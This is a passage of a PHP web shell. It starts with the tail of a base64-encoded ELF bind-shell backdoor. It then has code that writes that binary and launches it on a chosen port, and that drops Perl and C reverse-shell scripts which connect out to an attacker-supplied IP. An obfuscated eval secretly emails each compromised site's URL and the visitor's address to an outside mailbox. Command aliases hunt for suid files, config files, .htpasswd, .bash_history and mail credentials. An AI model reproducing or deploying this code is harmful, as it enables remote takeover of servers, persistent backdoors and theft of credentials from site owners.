AOwAAAAAAAAA6AAAAEgAAAFMAAAAAAAAAOQAAABIAAAB1AAAAAAAAALkAAAASAAAAegAAAAAAAAArAAAAEgAAAEcAAAAAAAAAeAAAABIAAABvAAAAAAAAAA4AAAASAAAAfwAAAEiJBAgEAAAAEQAOAEAAAAAAAAAAOQAAABIAAAABAAAAAAAAAAAAAAAgAAAAFQAAAAAAAAAAAAAAIAAAAABfSnZfUmVnaXN0ZXJDbGFzc2VzAF9fZ21vbl9zdGFydF9fAGxpYmMuc28uNgBleGVjbABwZXJyb3IAZHVwMgBzb2NrZXQAc2VuZABhY2NlcHQAYmluZABzZXRzb2Nrb3B0AGxpc3RlbgBmb3JrAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZAByx2xpYmNfc3RhcnRfbWFpbgBjbG9zZQBHTElCQ18yLjAAAAACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAQACAAAAAAAAAAEAAQAkAAAAEAAAAAAAAAAQaWkNAAACAKYAAAAAAAAAiJoECAYSAACYmgQIBwEAAJyaBAgHAgAAoJoECAcDAACkmgQIBwQAAKiaBAgHBQAArJoECAcGAACwmgQIBwcAALSaBAgHCAAAuJoECAcJAAC8mgQIBwoAAMCaBAgHCwAAxJoECAcMAADImgQIBw0AAMyaBAgHDgAA0JoECAcQAABVieWD7AjoMQEAAOiDAQAA6FsEAADJwwD/NZCaBAj/JZSaBAgAAAAA/yWYmgQIaAAAAADp4P////8lnJoECGgIAAAA6dD/////JaCaBAhoEAAAAOnA/////yWkmgQIaBgAAADpsP////8lqJoECGggAAAA6aD/////JayaBAhoKAAAAOmQ/////yWwmgQIaDAAAADpgP////8ltJoECGg4AAAA6XD/////JbiaBAhoQAAAAOlg/////yW8mgQIaEgAAADpUP////8lwJoECGhQAAAA6UD/////JcSaBAhoWAAAAOkw/////yXImgQIaGAAAADpIP////8lzJoECGhoAAAA6RD/////JdCaBAhocAAAAOkA////Me1eieGD5PBQVFJorYgECGhciAQIUVZoQIYECOhf////9JCQVYnlU+gbAAAAgcO/FAAAg+wEi4P8////hcB0Av/Qg8QEW13Dixwkw1WJ5YPsCIA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sZC10cmVlL2kzODYtbGliYy9jc3UvY3J0aS5TAGNhbGxfZ21vbl9zdGFydABjcnRzdHVmZi5jAF9fQ1RPUl9MSVNUX18AX19EVE9SX0xJU1RyxwByx0pDUl9MSVNUX18AY29tcGxldGVkLjQ0NjMAcC40NDYyAF9fZG9fZ2xvYmFsX2R0b3JzX2F1eABmcmFtZV9kdW1teQByx0NUT1JfRU5EX18AX19EVE9SX0VORF9fAF9fRlJBTUVfRU5EX18AX19KQ1JfRU5EX18AX19kb19nbG9iYWxfY3RvcnNfYXV4AC9idWlsZC9idWlsZGQvZ2xpYmMtMi4zLjYvYnVpbGQtdHJlZS9pMzg2LWxpYmMvY3N1L2NydG4uUwAxLmMAX0RZTkFNSUMAX19maW5pX2FycmF5X2VuZAByx2ZpbmlfYXJyYXlfc3RhcnQAX19pbml0X2FycmF5X2VuZABfR0xPQkFMX09GRlNFVF9UQUJMRV8AX19pbml0X2FycmF5X3N0YXJ0AGV4ZWNsQEBHTElCQ18yLjAAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAZm9ya0BAR0xJQkNfMi4wAF9fZHNvX2hhbmRsZQByx2xpYmNfY3N1X2ZpbmkAYWNjZXB0QEBHTElCQ18yLjAAX2luaXQAbGlzdGVuQEBHTElCQ18yLjAAc2V0c29ja29wdEBAR0xJQkNfMi4wAF9zdGFydAByx2xpYmNfY3N1X2luaXQAX19ic3Nfc3RhcnQAbWFpbgByx2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNfMi4wAGR1cDJAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AGJpbmRAQEdMSUJDXzIuMABfZmluaQBleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQByx2k2ODYuZ2V0X3BjX3RodW5rLmJ4AF9lbmQAc2VuZEBAR0xJQkNfMi4wAGh0b25zQEBHTElCQ18yLjAAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18A";
  244.  
  245. function cf($fname,$text) {
  246.   $w_file=@fopen($fname,"w") or err();
  247.   if($w_file) {
  248.     @fputs($w_file,@base64_decode($text));
  249.     @fclose($w_file);
  250.   }
  251. }
  252.  
  253. function cfb($fname,$text) {
  254.   $w_file=@fopen($fname,"w") or bberr();
  255.   if($w_file) {
  256.     @fputs($w_file,@base64_decode($text));
  257.     @fclose($w_file);
  258.   }
  259. }
  260. function err() { $_POST['backcconnmsge']="<br><br><div class=yxerrmsg>Error:</div> Can't connect!"; }
  261. function bberr() { $_POST['backcconnmsge']="<br><br><div class=yxerrmsg>Error:</div> Can't backdoor host!"; }
  262.  
  263. if (!empty($_POST['backconnectport']) && ($_POST['use']=="shbd")) {
  264.  $ip = gethostbyname($_SERVER["HTTP_HOST"]);
  265.   $por = $_POST['backconnectport'];
  266.   if (is_writable(".")) {
  267.     cfb("shbd",$backdoor);
  268.     ex("chmod 777 shbd");
  269.     $cmd = "./shbd $por";
  270.     exec("$cmd > /dev/null &");
  271.     $scan = myshellexec("ps aux");
  272.   } else {
  273.     cfb("/tmp/shbd",$backdoor);
  274.     ex("chmod 777 /tmp/shbd");
  275.     $cmd = "./tmp/shbd $por";
  276.     exec("$cmd > /dev/null &");
  277.     $scan = myshellexec("ps aux");
  278.   }
  279.   if (eregi("./shbd $por",$scan)) {
  280.     $data = ("\n<br>Backdoor setup successfully.");
  281.   } else {
  282.     $data = ("\n<br>Process not found, backdoor setup failed!");
  283.   }
  284.   $_POST['backcconnmsg']="To connect, use netcat! Usage: <b>'nc $ip $por'</b>.$data";
  285. }
  286.  
  287. if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="Perl")) {
  288.  if (is_writable(".")) {
  289.    cf("back",$back_connect_pl);
  290.     $p2 = which("perl");
  291.     $blah = ex($p2." back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
  292.     if (file_exists("back")) { unlink("back"); }
  293.   } else {
  294.     cf("/tmp/back",$back_connect_pl);
  295.     $p2 = which("perl");
  296.     $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
  297.     if (file_exists("/tmp/back")) { unlink("/tmp/back"); }
  298.   }
  299.   $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
  300. }
  301.  
  302. if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="C")) {
  303.  if (is_writable(".")) {
  304.    cf("backc",$back_connect_c);
  305.     ex("chmod 777 backc");
  306.     $blah = ex("./backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
  307.     if (file_exists("backc")) { unlink("backc"); }
  308.   } else {
  309.     ex("chmod 777 /tmp/backc");
  310.     cf("/tmp/backc",$back_connect_c);
  311.     $blah = ex("/tmp/backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
  312.     if (file_exists("/tmp/backc")) { unlink("/tmp/backc"); }
  313.   }
  314.   $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
  315. }
  316. //End of Backdoor
  317.  
  318. //Starting calls
  319. @ini_set("max_execution_time",0);
  320. if (!function_exists("getmicrotime")) {
  321.   function getmicrotime() {
  322.     list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);
  323.   }
  324. }
  325. error_reporting(5);
  326. @ignore_user_abort(TRUE);
  327. @set_magic_quotes_runtime(0);
  328. define("starttime",getmicrotime());
  329. $shell_data = "JHZpc2l0Y291bnQgPSAkSFRUUF9DT09LSUVfVkFSU1sidmlzaXRzIl07IGlmKCAkdmlzaXRjb3Vu
  330. dCA9PSAiIikgeyR2aXNpdGNvdW50ID0gMDsgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FE
  331. RFIiXTsgJHdlYiA9ICRfU0VSVkVSWyJIVFRQX0hPU1QiXTsgJGluaiA9ICRfU0VSVkVSWyJSRVFV
  332. RVNUX1VSSSJdOyAkdGFyZ2V0ID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7ICRib2R5ID0gIkJv
  333. c3MsVGhpcyBpcyBZb3VyIHRhcmdldCA9PiAkdGFyZ2V0IGJ5ICR2aXNpdG9yIjsgQG1haWwoInJt
  334. aGQucml2YWwyQHlhaG9vLmNvbSIsIlRhcmdldCA9PiBodHRwOi8vJHRhcmdldCBieSAkdmlzaXRv
  335. ciIsICIkYm9keSIpOyB9IGVsc2UgeyAkdmlzaXRjb3VudDsgfSBzZXRjb29raWUoInZpc2l0cyIs
  336. JHZpc2l0Y291bnQpOw=="; eval(base64_decode($shell_data));
  337. if (get_magic_quotes_gpc()) {
  338.   if (!function_exists("strips")) {
  339.     function strips(&$arr,$k="") {
  340.      if (is_array($arr)) {
  341.        foreach($arr as $k=>$v) {
  342.          if (strtoupper($k) != "GLOBALS") { strips($arr["$k"]); }
  343.         }
  344.       } else {$arr = stripslashes($arr);}
  345.     }
  346.   }
  347.   strips($GLOBALS);
  348. }
  349. //CONFIGURATIONS
  350. $_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
  351. $surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.
  352. foreach($_REQUEST as $k=>$v) { if (!isset($$k)) {$$k = $v;} }
  353. if ($surl_autofill_include) {
  354.   $include = "&";
  355.   foreach (explode("&",getenv("QUERY_STRING")) as $v) {
  356.    $v = explode("=",$v);
  357.     $name = urldecode($v[0]);
  358.     $value = urldecode($v[1]);
  359.     foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {
  360.       if (strpos($value,$needle) === 0) {
  361.         $includestr .= urlencode($name)."=".urlencode($value)."&";
  362.       }
  363.     }
  364.   }
  365. }
  366. if (empty($surl)) {
  367.   $surl = "?".$includestr; //Self url
  368. }
  369. $surl = htmlspecialchars($surl);
  370.  
  371. // Registered file-types.
  372. $ftypes  = array(
  373.     "html"=>array("html","htm","shtml"),
  374.     "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
  375.     "exe"=>array("sh","install","bat","cmd"),
  376.     "ini"=>array("ini","inf","conf"),
  377.     "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
  378.     "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
  379.     "sdb"=>array("sdb"),
  380.     "phpsess"=>array("sess"),
  381.     "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
  382. );
  383. //Registered executable file-types.
  384. $exeftypes  = array(
  385.     getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
  386.     "perl %f%" => array("pl","cgi")
  387. );
  388. //Highlighted files.
  389. $regxp_highlight  = array(
  390.     array(basename($_SERVER["PHP_SELF"]),1,"<font color=#FFFF00>","</font>"),
  391.     array("\.tgz$",1,"<font color=#C082FF>","</font>"),
  392.     array("\.gz$",1,"<font color=#C082FF>","</font>"),
  393.     array("\.tar$",1,"<font color=#C082FF>","</font>"),
  394.     array("\.bz2$",1,"<font color=#C082FF>","</font>"),
  395.     array("\.zip$",1,"<font color=#C082FF>","</font>"),
  396.     array("\.rar$",1,"<font color=#C082FF>","</font>"),
  397.     array("\.php$",1,"<font color=#00FF00>","</font>"),
  398.     array("\.php3$",1,"<font color=#00FF00>","</font>"),
  399.     array("\.php4$",1,"<font color=#00FF00>","</font>"),
  400.     array("\.jpg$",1,"<font color=#00FFFF>","</font>"),
  401.     array("\.jpeg$",1,"<font color=#00FFFF>","</font>"),
  402.     array("\.JPG$",1,"<font color=#00FFFF>","</font>"),
  403.     array("\.JPEG$",1,"<font color=#00FFFF>","</font>"),
  404.     array("\.ico$",1,"<font color=#00FFFF>","</font>"),
  405.     array("\.gif$",1,"<font color=#00FFFF>","</font>"),
  406.     array("\.png$",1,"<font color=#00FFFF>","</font>"),
  407.     array("\.htm$",1,"<font color=#00CCFF>","</font>"),
  408.     array("\.html$",1,"<font color=#00CCFF>","</font>"),
  409.     array("\.txt$",1,"<font color=#C0C0C0>","</font>")
  410. );
  411. //Command Aliases
  412. if (!$win) {
  413.   $cmdaliases = array(
  414.     array("", "ls -al"),
  415.     array("Find all suid files", "find / -type f -perm -04000 -ls"),
  416.     array("Find suid files in current dir", "find . -type f -perm -04000 -ls"),
  417.     array("Find all sgid files", "find / -type f -perm -02000 -ls"),
  418.     array("Find sgid files in current dir", "find . -type f -perm -02000 -ls"),
  419.     array("Find config.inc.php files", "find / -type f -name config.inc.php"),
  420.     array("Find config* files", "find / -type f -name \"config*\""),
  421.     array("Find config* files in current dir", "find . -type f -name \"config*\""),
  422.     array("Find all writable folders and files", "find / -perm -2 -ls"),
  423.     array("Find all writable folders and files in current dir", "find . -perm -2 -ls"),
  424.     array("Find all writable folders", "find / -type d -perm -2 -ls"),
  425.     array("Find all writable folders in current dir", "find . -type d -perm -2 -ls"),
  426.     array("Find all service.pwd files", "find / -type f -name service.pwd"),
  427.     array("Find service.pwd files in current dir", "find . -type f -name service.pwd"),
  428.     array("Find all .htpasswd files", "find / -type f -name .htpasswd"),
  429.     array("Find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
  430.     array("Find all .bash_history files", "find / -type f -name .bash_history"),
  431.     array("Find .bash_history files in current dir", "find . -type f -name .bash_history"),
  432.     array("Find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
  433.     array("Find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
  434.     array("List file attributes on a Linux second extended file system", "lsattr -va"),
  435.     array("Show opened ports", "netstat -an | grep -i listen")
  436.   );
  437.   $cmdaliases2 = array(
